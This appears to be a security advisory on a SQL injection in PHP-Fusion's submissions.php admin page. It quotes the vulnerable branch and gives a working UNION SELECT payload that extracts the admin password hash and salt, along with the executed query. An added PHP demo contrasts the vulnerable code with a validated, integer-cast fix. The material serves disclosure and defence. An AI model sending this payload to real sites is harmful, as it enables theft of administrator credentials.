<ul><li>/administration/submissions.php</li></ul><pre class="">if ((isset($_GET['action']) && $_GET['action'] == "2") && (isset($_GET['t']) && $_GET['t'] == "n")) {
if (isset($_POST['publish']) && (isset($_GET['submit_id']) && isnum($_GET['submit_id']))) {
$result = dbquery("SELECT ts.*, tu.user_id, tu.user_name FROM ".DB_SUBMISSIONS." ts
LEFT JOIN ".DB_USERS." tu ON ts.submit_user=tu.user_id
WHERE submit_id='".$_GET['submit_id']."'");
if (dbrows($result)) {
...
closetable();
} else {
redirect(FUSION_SELF.$aidlink);
}
} else if (isset($_POST['delete']) && (isset($_GET['submit_id']) && isnum($_GET['submit_id']))) {
...
} else { // reached for every other request; submit_id is never passed through isnum() in this branch
if ($settings['tinymce_enabled'] == 1) echo "<script type='text/javascript'>advanced();</script>\n";
$result = dbquery("SELECT ts.submit_criteria, tu.user_id, tu.user_name, tu.user_status
FROM ".DB_SUBMISSIONS." ts
LEFT JOIN ".DB_USERS." tu ON ts.submit_user=tu.user_id
WHERE submit_id='".$_GET['submit_id']."'");
if (dbrows($result)) {
</pre><p>When submit_id is not numeric, neither the publish branch nor the delete branch is entered (both require isnum($_GET['submit_id'])), so execution falls through to the final else, where $_GET['submit_id'] is concatenated into the SQL statement without any filtering and executed. This is a SQL injection.</p><p>When a user submits:</p><pre class="">action=2&aid=b62fe86d93a634b6&t=n&submit_id=1%27+union+select+1%2C2%2C%28select+concat%28user_name%2C0x3a3a%2Cuser_admin_password%2C0x3a%2Cuser_admin_salt%29+from+fusionp2SUI_users+limit+0%2C1%29%2C4%23</pre><p>The SQL statement executed is:</p><pre class="">SELECT ts.submit_criteria, tu.user_id, tu.user_name, tu.user_status FROM fusionp2SUI_submissions ts LEFT JOIN fusionp2SUI_users tu ON ts.submit_user=tu.user_id WHERE submit_id='1' union select 1,2,(select concat(user_name,0x3a3a,user_admin_password,0x3a,user_admin_salt) from fusionp2SUI_users limit 0,1),4#'</pre><p>The original query selects four columns, so the injected UNION SELECT supplies four; the third one carries the first user's name, admin password hash and salt, and the trailing # comments out the closing quote that the original string would otherwise leave unbalanced.</p><p>The page returns: </p><p><img alt="9F0180E1-FCED-4DC4-98FB-40DC641B03B0.png" src="https://images.seebug.org/@/uploads/1434695535297-9F0180E1-FCED-4DC4-98FB-40DC641B03B0.png" data-image-size="703,158"><br></p><p>This confirms that the vulnerability exists.</p>
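<p>To make the control flow concrete, the following is an added example, not PHP-Fusion's own code: it reproduces the branch structure of administration/submissions.php with dbquery() replaced by a function that only returns the SQL text, so it runs from the CLI with no database, and places a hardened variant beside it. Assumptions: isnum() is reimplemented here as an unsigned-integer check (PHP-Fusion's helper is not shown on this page), the table prefix fusionp2SUI_ is taken from the advisory's screenshot of the query, and the body of the delete branch is elided on the page, so it returns null here rather than a query.</p>

```php
<?php
// Added example, not PHP-Fusion's code. Mirrors the branch structure of
// administration/submissions.php with dbquery() replaced by a function that
// returns the SQL text, so this runs from the CLI without a database.

// Assumption: PHP-Fusion's isnum() accepts only unsigned integer strings.
function isnum($value) {
    return is_string($value) && preg_match('/^[0-9]+$/', $value) === 1;
}

// Table names as they appear in the executed query shown in the advisory.
const DB_SUBMISSIONS = 'fusionp2SUI_submissions';
const DB_USERS       = 'fusionp2SUI_users';

// Vulnerable: same shape as the original. Only the publish/delete branches
// call isnum(); the final else concatenates $get['submit_id'] unchecked.
function build_query_vulnerable(array $get, array $post) {
    if (isset($post['publish']) && isset($get['submit_id']) && isnum($get['submit_id'])) {
        return "SELECT ts.*, tu.user_id, tu.user_name FROM " . DB_SUBMISSIONS . " ts"
             . " LEFT JOIN " . DB_USERS . " tu ON ts.submit_user=tu.user_id"
             . " WHERE submit_id='" . $get['submit_id'] . "'";
    } elseif (isset($post['delete']) && isset($get['submit_id']) && isnum($get['submit_id'])) {
        return null; // delete branch body is elided on the page
    } else {
        // Injection point: no isnum() check on submit_id in this branch.
        return "SELECT ts.submit_criteria, tu.user_id, tu.user_name, tu.user_status FROM "
             . DB_SUBMISSIONS . " ts LEFT JOIN " . DB_USERS . " tu ON ts.submit_user=tu.user_id"
             . " WHERE submit_id='" . (isset($get['submit_id']) ? $get['submit_id'] : '') . "'";
    }
}

// Hardened: validate submit_id once before any branch, reject (caller would
// redirect) when it is not an unsigned integer, and cast to int so the value
// that reaches SQL is a number rather than attacker-controlled text.
function build_query_hardened(array $get, array $post) {
    if (!isset($get['submit_id']) || !isnum($get['submit_id'])) {
        return null;
    }
    $id = (int) $get['submit_id'];
    if (isset($post['publish'])) {
        return "SELECT ts.*, tu.user_id, tu.user_name FROM " . DB_SUBMISSIONS . " ts"
             . " LEFT JOIN " . DB_USERS . " tu ON ts.submit_user=tu.user_id"
             . " WHERE submit_id=" . $id;
    } elseif (isset($post['delete'])) {
        return null; // delete branch body is elided on the page
    }
    return "SELECT ts.submit_criteria, tu.user_id, tu.user_name, tu.user_status FROM "
         . DB_SUBMISSIONS . " ts LEFT JOIN " . DB_USERS . " tu ON ts.submit_user=tu.user_id"
         . " WHERE submit_id=" . $id;
}

// Constructed request: the advisory's payload, URL-decoded, sent with no
// publish/delete POST field so the final else branch is the one taken.
$get = [
    'action'    => '2',
    't'         => 'n',
    'submit_id' => "1' union select 1,2,(select concat(user_name,0x3a3a,"
                 . "user_admin_password,0x3a,user_admin_salt) from fusionp2SUI_users limit 0,1),4#",
];
$post = [];

echo "vulnerable: " . build_query_vulnerable($get, $post) . "\n";   // UNION reaches the database
var_dump(build_query_hardened($get, $post));                         // NULL: request rejected
echo "hardened:   " . build_query_hardened(['submit_id' => '1'], $post) . "\n";
```

<p>Running it prints the same injected statement the advisory shows for the vulnerable path, while the hardened builder refuses the request outright; a benign submit_id=1 still produces a normal query. Moving the isnum() check above the branches is the minimal fix; a prepared statement with a bound integer parameter would remove the string concatenation entirely.</p>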